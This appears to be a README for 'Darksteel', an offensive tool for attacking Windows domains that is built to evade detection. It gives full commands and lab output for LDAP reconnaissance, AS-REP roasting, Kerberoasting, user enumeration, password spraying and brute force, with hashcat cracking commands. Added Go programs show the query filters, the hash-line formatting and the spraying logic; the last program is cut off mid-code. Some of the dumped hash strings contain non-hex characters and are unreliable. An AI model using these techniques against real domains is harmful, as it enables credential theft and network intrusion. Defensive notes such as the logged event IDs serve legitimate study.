Introduction

Darksteel is a tool for automated information gathering and exploitation inside a Windows domain. Collecting domain information by hand during a penetration test is tedious, and exploitation needs a pile of separate tools, so this project brings the two together. It is designed with detection evasion as the main goal: techniques that attack the domain controller directly were deliberately left out, because where monitoring is in place they generate large numbers of alerts. Exploitation with detection bypass may be added later.

Demo

Queries can be run without supplying a username or password; the tool then authenticates as the local (currently logged-on) account. In that mode the -d argument must be the DC's DNS name rather than an IP address.

    darksteel.exe ldap -d dc.domain.com -n domain.com -m computer
    (banner omitted) v2.0.0
    [*] Domain Computers:
    WIN-KQH5FQSIJSH
    DESKTOP-AO8D722
    DESKTOP-DO7D913
    WIN-7UI852PL
    EXCHANGESERVER

Main features

ldap: with a single domain account (password or NTLM hash), collect useful domain information over LDAP, such as SPNs, delegation settings and live computers, as preparation for domain penetration
kerberos: exploit Kerberos weaknesses (AS-REP roasting and Kerberoasting)
blast: enumerate and brute-force domain users
computerip: resolve the IP addresses of domain computers in bulk

    (banner omitted) v2.0.0
    Automated domain information gathering and Kerberos exploitation tool
    Usage:
      darksteel [command]
    Available Commands:
      blast        Brute-force domain users
      completion   Generate the autocompletion script for the specified shell
      computerip   Look up the IP addresses of domain computers
      help         Help about any command
      kerberos     Kerberos exploitation
      ldap         LDAP queries
    Flags:
      -d, --dc string       domain controller address
      -n, --domain string   domain name
      -h, --help            help for darksteel
    Use "darksteel [command] --help" for more information about a command.

Usage examples

Ldap

1. With a single domain account (password or NTLM hash), gather everything useful over LDAP in one pass (-a): SPNs, delegation settings, live computers and so on, as preparation for domain penetration.

    darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -a
    (banner omitted) v2.0.0
    [*] Domain User:
    Administrator
    Guest
    krbtgt
    wanliu
    qt
    zz
    xx
    exchangeuser
    qt01
    ac
    [*] Domain Admins:
    CN=wanliu,CN=Users,DC=wanliu1,DC=com
    CN=Administrator,CN=Users,DC=wanliu1,DC=com
    [*] AdminSDHolder:
    Administrator
    krbtgt
    wanliu
    [*] sIDHistory:
    [*] Enterprise Admins:
    CN=Administrator,CN=Users,DC=wanliu1,DC=com
    [*] OU :
    Domain Controllers
    Microsoft Exchange Security Groups
    [*] Ca Computer:
    wanliu1-WIN-KQH5FQSIJSH-CA
    [*] Esc1 vulnerability template:
    [*] Esc2 vulnerability template:
    [*] MsSql Computer:
    WIN-7UI852PL
    [*] Maq Number:
    10
    [*] DC Computer:
    WIN-KQH5FQSIJSH
    [*] Acl :
    qt full control ------> ac
    qt reset password ------> zz
    qt01 has DCSync rights
    [*] Trust Domain:
    [*] Domain Computers:
    WIN-KQH5FQSIJSH
    DESKTOP-AO8D722
    DESKTOP-DO7D913
    WIN-7UI852PL
    EXCHANGESERVER
    [*] Survival Computer:
    WIN-KQH5FQSIJSH --> Windows Server 2012 R2 Standard
    DESKTOP-AO8D722 --> Windows 10 Pro
    DESKTOP-DO7D913 --> Windows 10 Pro
    WIN-7UI852PL --> Windows Server 2008 R2 Enterprise
    EXCHANGESERVER --> Windows Server 2016 Datacenter
    [*] Exchange Servers:
    CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
    [*] Exchange Trusted Subsystem:
    CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
    [*] Exchange Organization Management:
    CN=Administrator,CN=Users,DC=wanliu1,DC=com
    [*] Asreproast User:
    xx
    [*] Unconstrained delegation (computers):
    CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=wanliu1,DC=com [WIN-KQH5FQSIJSH]
    [*] Unconstrained delegation (users):
    CN=zz,CN=Users,DC=wanliu1,DC=com [zz]
    [*] Constrained delegation (computers):
    CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com [WIN-7UI852PL]
    cifs/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
    cifs/WIN-KQH5FQSIJSH.wanliu1.com
    cifs/WIN-KQH5FQSIJSH
    cifs/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
    cifs/WIN-KQH5FQSIJSH/WANLIU1
    [*] Constrained delegation (users):
    [*] Resource-based constrained delegation:
    CN=DESKTOP-AO8D722,CN=Computers,DC=wanliu1,DC=com -> creator S-1-5-21-3163795713-59934753-1752793692-1106[qt]
    CN=DESKTOP-DO7D913,CN=Computers,DC=wanliu1,DC=com -> creator S-1-5-21-3163795713-59934753-1752793692-1106[qt]
    CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com -> creator S-1-5-21-3163795713-59934753-1752793692-1106[qt]
    [*] SPN:CN=xx,CN=Users,DC=wanliu1,DC=com
    cifs/admin
    [*] SPN:CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=wanliu1,DC=com
    exchangeAB/WIN-KQH5FQSIJSH
    exchangeAB/WIN-KQH5FQSIJSH.wanliu1.com
    Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/WIN-KQH5FQSIJSH.wanliu1.com
    ldap/WIN-KQH5FQSIJSH.wanliu1.com/ForestDnsZones.wanliu1.com
    ldap/WIN-KQH5FQSIJSH.wanliu1.com/DomainDnsZones.wanliu1.com
    TERMSRV/WIN-KQH5FQSIJSH
    TERMSRV/WIN-KQH5FQSIJSH.wanliu1.com
    DNS/WIN-KQH5FQSIJSH.wanliu1.com
    GC/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
    RestrictedKrbHost/WIN-KQH5FQSIJSH.wanliu1.com
    RestrictedKrbHost/WIN-KQH5FQSIJSH
    RPC/f20db9b6-b740-4670-ab3c-ead6acf58f4f._msdcs.wanliu1.com
    HOST/WIN-KQH5FQSIJSH/WANLIU1
    HOST/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
    HOST/WIN-KQH5FQSIJSH
    HOST/WIN-KQH5FQSIJSH.wanliu1.com
    HOST/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
    E3514235-4B06-11D1-AB04-00C04FC2DCD2/f20db9b6-b740-4670-ab3c-ead6acf58f4f/wanliu1.com
    ldap/WIN-KQH5FQSIJSH/WANLIU1
    ldap/f20db9b6-b740-4670-ab3c-ead6acf58f4f._msdcs.wanliu1.com
    ldap/WIN-KQH5FQSIJSH.wanliu1.com/WANLIU1
    ldap/WIN-KQH5FQSIJSH
    ldap/WIN-KQH5FQSIJSH.wanliu1.com
    ldap/WIN-KQH5FQSIJSH.wanliu1.com/wanliu1.com
    [*] SPN:CN=EXCHANGESERVER,CN=Computers,DC=wanliu1,DC=com
    IMAP/EXCHANGESERVER
    IMAP/exchangeserver.wanliu1.com
    IMAP4/EXCHANGESERVER
    IMAP4/exchangeserver.wanliu1.com
    POP/EXCHANGESERVER
    POP/exchangeserver.wanliu1.com
    POP3/EXCHANGESERVER
    POP3/exchangeserver.wanliu1.com
    exchangeRFR/EXCHANGESERVER
    exchangeRFR/exchangeserver.wanliu1.com
    exchangeAB/EXCHANGESERVER
    exchangeAB/exchangeserver.wanliu1.com
    exchangeMDB/EXCHANGESERVER
    exchangeMDB/exchangeserver.wanliu1.com
    SMTP/EXCHANGESERVER
    SMTP/exchangeserver.wanliu1.com
    SmtpSvc/EXCHANGESERVER
    SmtpSvc/exchangeserver.wanliu1.com
    TERMSRV/EXCHANGESERVER
    TERMSRV/exchangeserver.wanliu1.com
    WSMAN/exchangeserver
    WSMAN/exchangeserver.wanliu1.com
    RestrictedKrbHost/EXCHANGESERVER
    HOST/EXCHANGESERVER
    RestrictedKrbHost/exchangeserver.wanliu1.com
    HOST/exchangeserver.wanliu1.com
    [*] SPN:CN=DESKTOP-AO8D722,CN=Computers,DC=wanliu1,DC=com
    TERMSRV/DESKTOP-AO8D722
    TERMSRV/DESKTOP-AO8D722.wanliu1.com
    RestrictedKrbHost/DESKTOP-AO8D722
    HOST/DESKTOP-AO8D722
    RestrictedKrbHost/DESKTOP-AO8D722.wanliu1.com
    HOST/DESKTOP-AO8D722.wanliu1.com
    [*] SPN:CN=DESKTOP-DO7D913,CN=Computers,DC=wanliu1,DC=com
    TERMSRV/DESKTOP-DO7D913
    TERMSRV/DESKTOP-DO7D913.wanliu1.com
    RestrictedKrbHost/DESKTOP-DO7D913
    HOST/DESKTOP-DO7D913
    RestrictedKrbHost/DESKTOP-DO7D913.wanliu1.com
    HOST/DESKTOP-DO7D913.wanliu1.com
    [*] SPN:CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com
    WSMAN/WIN-7UI852PL
    WSMAN/WIN-7UI852PL.wanliu1.com
    TERMSRV/WIN-7UI852PL
    TERMSRV/WIN-7UI852PL.wanliu1.com
    MSSQLSvc/WIN-7UI852PL.wanliu1.com:1433
    MSSQLSvc/WIN-7UI852PL.wanliu1.com
    RestrictedKrbHost/WIN-7UI852PL
    HOST/WIN-7UI852PL
    RestrictedKrbHost/WIN-7UI852PL.wanliu1.com
    HOST/WIN-7UI852PL.wanliu1.com
    [*] SPN:CN=krbtgt,CN=Users,DC=wanliu1,DC=com
    kadmin/changepw
    [*] SPN:CN=zz,CN=Users,DC=wanliu1,DC=com
    mssql/DESKTOP-AO8D722
2. To find the users or computers that a keyword points at, use the keyword search (-z); here it is used to spot which accounts are described as administrators. The output lists each matching object together with the attribute text that matched. The lab domain has a Chinese locale, so the search term is 管理员 ("administrator").

    darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -z 管理员
    (banner omitted) v1.0.8
    [*] CN=Administrators,CN=Builtin,DC=test,DC=com --> Administrators have complete and unrestricted access to the computer/domain
    [*] CN=Schema Admins,CN=Users,DC=test,DC=com --> Designated administrators of the schema
    [*] CN=Enterprise Admins,CN=Users,DC=test,DC=com --> Designated administrators of the enterprise
    [*] CN=Domain Admins,CN=Users,DC=test,DC=com --> Designated administrators of the domain
    [*] CN=zz,CN=Users,DC=test,DC=com --> fake administrator
3. Anything the built-in queries do not cover can be fetched with a raw LDAP filter (-f) and a comma-separated list of attributes to return (-t). Note that under the kerberos subcommand these same letters mean something else (-f is the output format, -t the target user).

    darksteel.exe ldap -n test.com -d 192.168.1.1 -u user -p password(hash) -f "(objectClass=Computer)" -t cn,dNSHostName
    (banner omitted) v1.0.8
    DN: CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=test,DC=com
    cn: [WIN-KQH5FQSIJSH]
    dNSHostName: [WIN-KQH5FQSIJSH.test.com]
    DN: CN=DESKTOP-AO8D722,CN=Computers,DC=test,DC=com
    cn: [DESKTOP-AO8D722]
    dNSHostName: [DESKTOP-AO8D722.test.com]
    DN: CN=DESKTOP-DO7D913,CN=Computers,DC=test,DC=com
    cn: [DESKTOP-DO7D913]
    dNSHostName: [DESKTOP-DO7D913.test.com]
    DN: CN=WIN-7UI852PL,CN=Computers,DC=test,DC=com
    cn: [WIN-7UI852PL]
    dNSHostName: [WIN-7UI852PL.test.com]
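Every category in the output above comes down to a few attribute tests: userAccountControl bits, the presence of servicePrincipalName or msDS-AllowedToDelegateTo, and, for the RBCD candidates, the mS-DS-CreatorSID of machine accounts added under the MachineAccountQuota. The Go program below is an added example written for this page, not Darksteel's code. It shows the server-side filter each category reduces to, runs the same tests client-side over a set of entries so the logic is visible, and decodes a binary SID into the S-1-5-... form shown next to "creator". The Entry and Finding types and the mkSID helper are the example's own, and the sample entries are constructed to mirror the objects in the output, not real directory data.

```go
package main

import (
	"encoding/binary"
	"fmt"
	"strings"
)

// userAccountControl bits behind the findings (values from MS-SAMR).
const (
	uacAccountDisable        = 0x0000002
	uacTrustedForDelegation  = 0x0080000 // unconstrained delegation
	uacDontReqPreauth        = 0x0400000 // AS-REP roastable
	uacTrustedToAuthForDeleg = 0x1000000 // constrained delegation with protocol transition
)

// Filters are the server-side LDAP queries each category reduces to; the OID is the
// LDAP_MATCHING_RULE_BIT_AND rule used to test individual userAccountControl bits.
var Filters = map[string]string{
	"asreproast":    fmt.Sprintf("(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=%d))", uacDontReqPreauth),
	"kerberoast":    fmt.Sprintf("(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)(!(sAMAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=%d)))", uacAccountDisable),
	"unconstrained": fmt.Sprintf("(userAccountControl:1.2.840.113556.1.4.803:=%d)", uacTrustedForDelegation),
	"constrained":   "(msDS-AllowedToDelegateTo=*)",
	"rbcd":          "(msDS-AllowedToActOnBehalfOfOtherIdentity=*)",
}

// Entry is the subset of attributes the triage needs, as an LDAP search returns them.
type Entry struct {
	DN, SAM    string
	UAC        int
	SPNs       []string
	DelegateTo []string // msDS-AllowedToDelegateTo
	CreatorSID []byte   // mS-DS-CreatorSID: set on machines joined via the MachineAccountQuota
	IsComputer bool
}

type Finding struct{ Kind, Subject, Detail string }

// mkSID builds a binary SID under the NT authority (5); a constructed-data helper.
func mkSID(subs ...uint32) []byte {
	b := []byte{1, byte(len(subs)), 0, 0, 0, 0, 0, 5}
	for _, s := range subs {
		var le [4]byte
		binary.LittleEndian.PutUint32(le[:], s)
		b = append(b, le[:]...)
	}
	return b
}

// sidToString converts a binary objectSid / mS-DS-CreatorSID to "S-1-5-21-..." form.
func sidToString(b []byte) string {
	if len(b) < 8 || 8+4*int(b[1]) > len(b) {
		return ""
	}
	var auth uint64 // 48-bit identifier authority, big-endian
	for _, x := range b[2:8] {
		auth = auth<<8 | uint64(x)
	}
	var sb strings.Builder
	fmt.Fprintf(&sb, "S-%d-%d", b[0], auth)
	for i := 0; i < int(b[1]); i++ { // sub-authorities are little-endian
		fmt.Fprintf(&sb, "-%d", binary.LittleEndian.Uint32(b[8+4*i:]))
	}
	return sb.String()
}

// Triage applies the same tests as Filters, but client-side over already fetched entries.
func Triage(entries []Entry) []Finding {
	var out []Finding
	for _, e := range entries {
		if e.UAC&uacAccountDisable != 0 {
			continue // disabled accounts cannot be roasted or used for delegation abuse
		}
		if !e.IsComputer && e.UAC&uacDontReqPreauth != 0 {
			out = append(out, Finding{"asreproast", e.SAM, "DONT_REQ_PREAUTH set"})
		}
		if !e.IsComputer && len(e.SPNs) > 0 && !strings.EqualFold(e.SAM, "krbtgt") {
			out = append(out, Finding{"kerberoast", e.SAM, strings.Join(e.SPNs, ",")})
		}
		if e.UAC&uacTrustedForDelegation != 0 {
			out = append(out, Finding{"unconstrained", e.DN, ""})
		}
		if len(e.DelegateTo) > 0 {
			kind := "constrained"
			if e.UAC&uacTrustedToAuthForDeleg != 0 {
				kind = "constrained+protocol-transition" // S4U2Self allowed: no victim interaction needed
			}
			out = append(out, Finding{kind, e.DN, strings.Join(e.DelegateTo, ",")})
		}
		if e.IsComputer && len(e.CreatorSID) > 0 {
			// The creator of a MAQ-joined machine keeps write access to it and can therefore set RBCD on it.
			out = append(out, Finding{"rbcd-candidate", e.DN, "creator " + sidToString(e.CreatorSID)})
		}
	}
	return out
}

// SampleEntries is constructed to mirror the README output; it is not real directory data.
func SampleEntries() []Entry {
	qt := mkSID(21, 3163795713, 59934753, 1752793692, 1106)
	return []Entry{
		{DN: "CN=xx,CN=Users,DC=wanliu1,DC=com", SAM: "xx", UAC: 0x200 | uacDontReqPreauth, SPNs: []string{"cifs/admin"}},
		{DN: "CN=zz,CN=Users,DC=wanliu1,DC=com", SAM: "zz", UAC: 0x200 | uacTrustedForDelegation, SPNs: []string{"mssql/DESKTOP-AO8D722"}},
		{DN: "CN=krbtgt,CN=Users,DC=wanliu1,DC=com", SAM: "krbtgt", UAC: 0x202, SPNs: []string{"kadmin/changepw"}},
		{DN: "CN=WIN-7UI852PL,CN=Computers,DC=wanliu1,DC=com", SAM: "WIN-7UI852PL$", UAC: 0x1000, IsComputer: true,
			DelegateTo: []string{"cifs/WIN-KQH5FQSIJSH.wanliu1.com"}, CreatorSID: qt},
		{DN: "CN=WIN-KQH5FQSIJSH,OU=Domain Controllers,DC=wanliu1,DC=com", SAM: "WIN-KQH5FQSIJSH$", UAC: 0x82000, IsComputer: true},
	}
}

func main() {
	for _, f := range Triage(SampleEntries()) {
		fmt.Printf("[%s] %s %s\n", f.Kind, f.Subject, f.Detail)
	}
	fmt.Println("server-side filter for asreproast:", Filters["asreproast"])
}
```

The disabled krbtgt entry drops out before any test runs, which is why the tool's Kerberoast list never shows kadmin/changepw even though krbtgt carries an SPN. Protocol transition is reported separately because it is the variant that lets the delegating account impersonate users without their involvement.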

Kerberos

1. AS-REP roasting: for users with Kerberos pre-authentication disabled, the KDC hands out the AS-REP encrypted with the user's key without any domain authentication. The tool dumps that material in hashcat or john format (hashcat by default); whatever the cracker recovers is that user's password. If no target user is given, a domain account is required so the tool can find roastable users through LDAP and dump all of them. hashcat command: hashcat -m 18200 hash.txt pass.txt --force

    darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -u user -p password(hash)
    (banner omitted) v1.0.8
    [*] Target domain: test.com (192.168.1.1)
    [*] Use LDAP to retreive vulnerable accounts
    [*] Ask AS-Rep for user zz without pre-authentication
    [*] Get a valid ticket with encryption: arcfour-hmac-md5
    [*] Hashes:
    $krb5asrep$23$zz@test.COM:8193197b866da1209af56fd5f4610c38$bc8ee9135bd82f0b2333
    af24ae376bb014cd0400ef9b8ff0d0dbc8180c671cc6fe1290cd2c876f84352126bd7948adbc6b3f
    51d85ebe1e8dfa15c53443fb835d743ce3cd3e5ac7f2549271385134bc685ffe55bdb30103cf132a
    69267d9cec9201f478547892b3343c7427b83a901f6c01d877a4357d14d0384cd8b3cf2940e6e32e
    a862d700499c6a7791e4fd17228a9adc5db5ebbe6e69d59bcde7f7e3fd3751ba54eda6339cb87b69
    5a7a5daf5964a0e626129e8acc9b783aed7c060a4044d41f02da52bcff466a32dc465de10cc7e90c
    7c5b84fcac701107da4300db4cfc36d58cc0524f23b5e16789656
2. With a target user specified (-t), no domain account is needed at all.

    darksteel.exe kerberos -m asreproast -d 192.168.1.1 -n test.com -t zz
    (banner omitted) v1.0.8
    [*] Target domain: test.com (192.168.1.1)
    [*] Ask AS-Rep for user zz without pre-authentication
    [*] Get a valid ticket with encryption: arcfour-hmac-md5
    [*] Hashes:
    $krb5asrep$23$zz@test.COM:8193197b866da1209af56fd5f4610c38$bc8ee9135bd82f0b2333
    af24ae376bb014cd0400ef9b8ff0d0dbc8180c671cc6fe1290cd2c876f84352126bd7948adbc6b3f
    51d85ebe1e8dfa15c53443fb835d743ce3cd3e5ac7f2549271385134bc685ffe55bdb30103cf132a
    69267d9cec9201f478547892b3343c7427b83a901f6c01d877a4357d14d0384cd8b3cf2940e6e32e
    a862d700499c6a7791e4fd17228a9adc5db5ebbe6e69d59bcde7f7e3fd3751ba54eda6339cb87b69
    5a7a5daf5964a0e626129e8acc9b783aed7c060a4044d41f02da52bcff466a32dc465de10cc7e90c
    7c5b84fcac701107da4300db4cfc36d58cc0524f23b5e16789656
3. Kerberoasting: when a user account has an SPN set, a service ticket encrypted with that account's key can be requested and dumped in hashcat or john format (hashcat by default); whatever the cracker recovers is that user's password. If no target user is given, a domain account is required so the tool can find candidates through LDAP and dump all of them. Unlike AS-REP roasting, a credential (or a TGT, see below) is always needed here, because a service ticket can only be requested with a TGT; -t merely skips the LDAP lookup. hashcat command: hashcat -m 13100 hash.txt pass.txt --force

    darksteel.exe kerberos -m kerberoast -d 192.168.1.1 -n test.com -u user -p password(hash)
    (banner omitted) v1.0.8
    [*] Target domain: test.com (192.168.1.1)
    [*] Use username and password/key as credentials to request a TGT
    [*] Use LDAP to retreive vulnerable accounts
    [*] Found 1 users to Kerberoast found in LDAP
    [*] CN=zz,CN=Users,DC=test,DC=com
    sAMAccountName : zz
    distinguishedName : CN=zz,CN=Users,DC=test,DC=com
    servicePrincipalName: mssql/DESKTOP-AO8D722
    [*] Asking TGS for principal: zz
    [*] Hashes:
    $krb5tgs$23$*zz$WANLIU1.COM$zz*$c1c2da2dbd793dbe2f627132f992e3a7$a3f77d350104545
    3a8ab2917a0961d3ca54f4e97610d00ee5cb3ac03dbc84a9831d4bbd007d143619de8ca277e36c97
    7f5e672396750350a14916b5dece2daa279e47f7684b03d044e9e748f5f3ce777efe73e4df64d814
    75dd1217784fe78fabe7195f5dc659520081152c045574200bfe68aad97cc6c529c3d6e57eefbbaa
    f270fdcee23445ce160b4c71346753fd8464aa5e6073b8b0c9d6e3865a4f48dc61d05f9a97a4d0a5
    6caf0ad0059e058e4746e260d2905e429e31ed7655c87fghtf5654f54c9e506d3b737f678f9fd2bd
    68c226e61f852a6c1e35ceb3b1f6f3c78f1160ddb4ea290870eff55f4ba6ca0161a5bf5545a8da59
    fe20610aafa91fbbe7b8e8f3ff715f965bd09681aa41b929f98a94f8084fca1cb98f38e718612f1e
    51d779c622ae91e0ee62bd2a809b59e0031f57c2647b8ef15972015f3669a80d489139153d20312b
    c8f9be5252fc6ed6dd78a22dec9458d41e6a940534d33c8ajhhgj5f36d224332fec721874e46fea7
    b2397922c6cbe689ef0ff7d0cb1c9d89c975c462a746ae5d473b9cfc37fadcecc96a3907980a13b9
    28cd053467090458ab0a8995e1237cef641698172d6537c2ef4e5987726d6a007b03ffec867f3ab8
    5fd1ce7e89f6bc694266c61ca74e6af2200bfa3a90313bbda3282ed267e6f59d477e789e4c454f66
    ac942df4461fc2bad317e23176e8cc299261c1c947dca068153b2fab47b018b2e82ba08d20078195
    8149dd3b03c27ec17bee22496c7cccb3e6acd23c6e7bce62658f7274ce3eef06aa16d4c94bbfbe42
    3f9e7b7254625d28c27fbf2bc07aeec63f7ebe25b49742346eea44e61478e212d719be9c98a53a1c
    2657790c02654fa1c9caf5bdbb816cece4e6ce6e48c86323a8596f059b9d4e4856d52480f56272a5
    a393473eaf0ab12b3e085aa97ee28311c4cd54797229522001a3e5fd5fdefgrg4e03efe691635448
    392ea8275cb0916bcc205fb2376ae60008a24cdea072069ca4710d9290d77bab830cf96c97c31fb0
    bab707802409efbad0bb30c6efe207c75632225a52ec757f878e8d97647c34d6703e2a94f2701739
    9ba6efd18a4f714b63468810929287ca3359fff00632ab5de545667d39d6e77456c1b7df57d400a7
    ec9ad23b0fc93f24f9c151d9509aeabfbb298a02865bd5d16a273fc6ffb8df14456e0b2eaf973653
    895e7f51f73606294845d6a9ccab6a68b5774a706f06a692c4b619e50ac35fa48e1aadb6323c279f
    68e4c6d29462bd82371a0f24744cbb43bf4ca3a6cca165fe4b4025a4b69a2208bd16eacb0a029973
    86bff57b4fa0924713d7b32295096ac7cc7942299a0b5126880c768edcb7743a429ded7323941cdd
    c6293d7962553c7423b465d9c1c9aae98cf14e30ff0f21e8d75275a48dc1fac5bb37987057e74f83
    f7aeb47dc601826d6643f95c33c7d388a3120b08ed2864e0c0bdacfb41594cea5d286583ed2fd520
    89857642a160760dca1cea4
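Both roasting modes end the same way: the enc-part of a Kerberos reply (the AS-REP for roastable users, the service ticket inside the TGS-REP for Kerberoasting) is rewritten as a hash line for the cracker. The Go program below is an added example for this page, not Darksteel's code. It shows where the integrity checksum sits for each encryption type (the thing -e changes) and how the hashcat lines quoted above, plus the john variant of the AS-REP line, are assembled; it goes beyond the page's RC4 examples by covering the AES types and their hashcat modes. The cipher bytes are constructed, not captured traffic; the ':' to '~' rewrite of the SPN follows what Impacket's GetUserSPNs does, and the john form of the TGS line is left out.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// HashcatMode maps (message, etype) to hashcat's -m value. The etype-23 modes are
// the ones the README quotes; the others are their AES counterparts.
func HashcatMode(msg string, etype int) (int, error) {
	modes := map[string]map[int]int{
		"asrep": {23: 18200, 17: 32100, 18: 32200},
		"tgs":   {23: 13100, 17: 19600, 18: 19700},
	}
	if m, ok := modes[msg][etype]; ok {
		return m, nil
	}
	return 0, fmt.Errorf("no hashcat mode for %s with etype %d", msg, etype)
}

// splitCipher separates the checksum from the ciphertext of an EncryptedData.cipher blob.
// RC4-HMAC (etype 23) prepends a 16-byte HMAC-MD5; AES (17, 18) appends a 12-byte HMAC-SHA1-96.
func splitCipher(etype int, cipher []byte) (checksum, edata []byte, err error) {
	switch etype {
	case 23:
		if len(cipher) <= 16 {
			return nil, nil, errors.New("cipher too short for etype 23")
		}
		return cipher[:16], cipher[16:], nil
	case 17, 18:
		if len(cipher) <= 12 {
			return nil, nil, errors.New("cipher too short for AES etype")
		}
		return cipher[len(cipher)-12:], cipher[:len(cipher)-12], nil
	}
	return nil, nil, fmt.Errorf("unsupported etype %d", etype)
}

// FormatASREP renders an AS-REP enc-part as a cracker line; format is "hashcat" or "john".
// The realm is written the way the KDC spells it (upper case); for AES it is part of the salt.
func FormatASREP(user, realm string, etype int, cipher []byte, format string) (string, error) {
	ck, ed, err := splitCipher(etype, cipher)
	if err != nil {
		return "", err
	}
	realm = strings.ToUpper(realm)
	switch {
	case etype != 23:
		return fmt.Sprintf("$krb5asrep$%d$%s$%s$%x$%x", etype, user, realm, ck, ed), nil
	case format == "john":
		return fmt.Sprintf("$krb5asrep$%s@%s:%x$%x", user, realm, ck, ed), nil
	default:
		return fmt.Sprintf("$krb5asrep$23$%s@%s:%x$%x", user, realm, ck, ed), nil
	}
}

// FormatTGS renders a service ticket's enc-part in hashcat form. A ':' in the SPN
// (the MSSQLSvc port) is replaced by '~' so it cannot collide with a separator.
func FormatTGS(user, realm, spn string, etype int, cipher []byte) (string, error) {
	ck, ed, err := splitCipher(etype, cipher)
	if err != nil {
		return "", err
	}
	realm, spn = strings.ToUpper(realm), strings.ReplaceAll(spn, ":", "~")
	if etype == 23 {
		return fmt.Sprintf("$krb5tgs$23$*%s$%s$%s*$%x$%x", user, realm, spn, ck, ed), nil
	}
	return fmt.Sprintf("$krb5tgs$%d$%s$%s$*%s*$%x$%x", etype, user, realm, spn, ck, ed), nil
}

func main() {
	// Constructed bytes standing in for a real enc-part; no key material involved.
	cipher := make([]byte, 40)
	for i := range cipher {
		cipher[i] = byte(i)
	}
	line, _ := FormatASREP("zz", "test.com", 23, cipher, "hashcat")
	mode, _ := HashcatMode("asrep", 23)
	fmt.Printf("hashcat -m %d: %s\n", mode, line)
	line, _ = FormatTGS("zz", "test.com", "MSSQLSvc/WIN-7UI852PL.wanliu1.com:1433", 23, cipher)
	mode, _ = HashcatMode("tgs", 23)
	fmt.Printf("hashcat -m %d: %s\n", mode, line)
}
```

Requesting AES tickets (-e) only changes where the checksum is cut and which hashcat mode applies; it does not make the crack harder in principle, but AES keys are salted with realm and username, so the realm field must be exact.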

blast

1. When a domain has been located but no domain account is available yet, enumerate domain users. Use -v to also print the names that do not exist. Each probe is an AS-REQ, which the DC logs as event 4768 (result code 0x6 for unknown names), so this is not silent.

    darksteel.exe blast -m userenum -d 192.168.1.1 -n test.com -U users.txt
    (banner omitted) v1.0.8
    [+] USERNAME: zz@test.com
    [+] USERNAME: xx@test.com
    Done! Tested logins in 0.034 seconds

    darksteel.exe blast -m userenum -d 192.168.1.1 -n test.com -U users.txt -v
    (banner omitted) v1.0.8
    [!] asdfqwadad@test.com - User does not exist
    [!] admin@test.com - User does not exist
    [+] USERNAME: zz@test.com
    [+] USERNAME: xx@test.com
    Done! Tested logins in 0.002 seconds
2. Once users are known, spray a single password across all of them. One password per round keeps the attempt count per user low; check the domain lockout threshold and observation window before starting.

    darksteel.exe blast -m passspray -d 192.168.1.1 -n test.com -U users.txt -p 123456
    (banner omitted) v1.0.8
    [+] SUCCESS: zz@test.com:123456
    Done! Tested logins in 0.024 seconds
3. Brute-force a single user with a password dictionary. Every failed attempt counts towards that user's lockout threshold and is logged as event 4771 (pre-authentication failed).

    darksteel.exe blast -m blastpass -d 192.168.1.1 -n test.com -u zz -P pass.txt
    (banner omitted) v1.0.8
    [+] SUCCESS: zz@test.com:123456
    Done! Tested logins in 0.013 seconds
4. Brute-force with a user:password dictionary.

    darksteel.exe blast -m userpass -d 192.168.1.1 -n test.com -F userpass.txt
    (banner omitted) v1.0.8
    [+] SUCCESS: zz@test.com:123456
    Done! Tested logins in 0.010 seconds
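All four blast modes rest on how the KDC answers an AS-REQ: the error code alone says whether a name exists, whether a password was right, and whether an account is locked. The Go program below is an added example for this page, not Darksteel's code (which sends the real AS-REQ with gokrb5, in the style of kerbrute). It runs the enumeration and spraying decisions against a constructed in-memory KDC so the logic is visible: KDC_ERR_PREAUTH_REQUIRED and an outright AS-REP both mean "user exists", KDC_ERR_KEY_EXPIRED means the password was correct even though no ticket came back, KDC_ERR_CLIENT_REVOKED means stop, and a per-user budget keeps spraying below the lockout threshold. The KDC interface, fakeKDC, account and the sample accounts are the example's own; the names echo the README output and the passwords are invented.

```go
package main

import (
	"fmt"
	"strings"
)

// KRB-ERROR codes from the AS exchange (RFC 4120 section 7.5.9) that drive every decision below.
const (
	kdcErrCPrincipalUnknown = 6  // no such user
	kdcErrClientRevoked     = 18 // account locked out or disabled
	kdcErrKeyExpired        = 23 // password expired, but the credentials were correct
	kdcErrPreauthFailed     = 24 // wrong password
	kdcErrPreauthRequired   = 25 // user exists and the KDC wants pre-authentication
)

// KDC is the AS-REQ round trip: 0 means an AS-REP came back, anything else is the error code.
type KDC interface {
	ASReq(user, password string) int
}

// account and fakeKDC are a constructed stand-in for a domain controller.
type account struct {
	password                   string
	locked, expired, noPreauth bool
}

type fakeKDC struct {
	accounts map[string]*account
	Attempts map[string]int // pre-auth attempts per user: what counts toward lockout
}

func (k *fakeKDC) ASReq(user, password string) int {
	a, ok := k.accounts[strings.ToLower(user)]
	switch {
	case !ok:
		return kdcErrCPrincipalUnknown
	case a.locked:
		return kdcErrClientRevoked
	case password == "": // no pre-auth data sent: an existence probe, not an attempt
		if a.noPreauth {
			return 0 // AS-REP handed out directly: this account is AS-REP roastable
		}
		return kdcErrPreauthRequired
	}
	k.Attempts[user]++
	switch {
	case password != a.password:
		return kdcErrPreauthFailed
	case a.expired:
		return kdcErrKeyExpired
	}
	return 0
}

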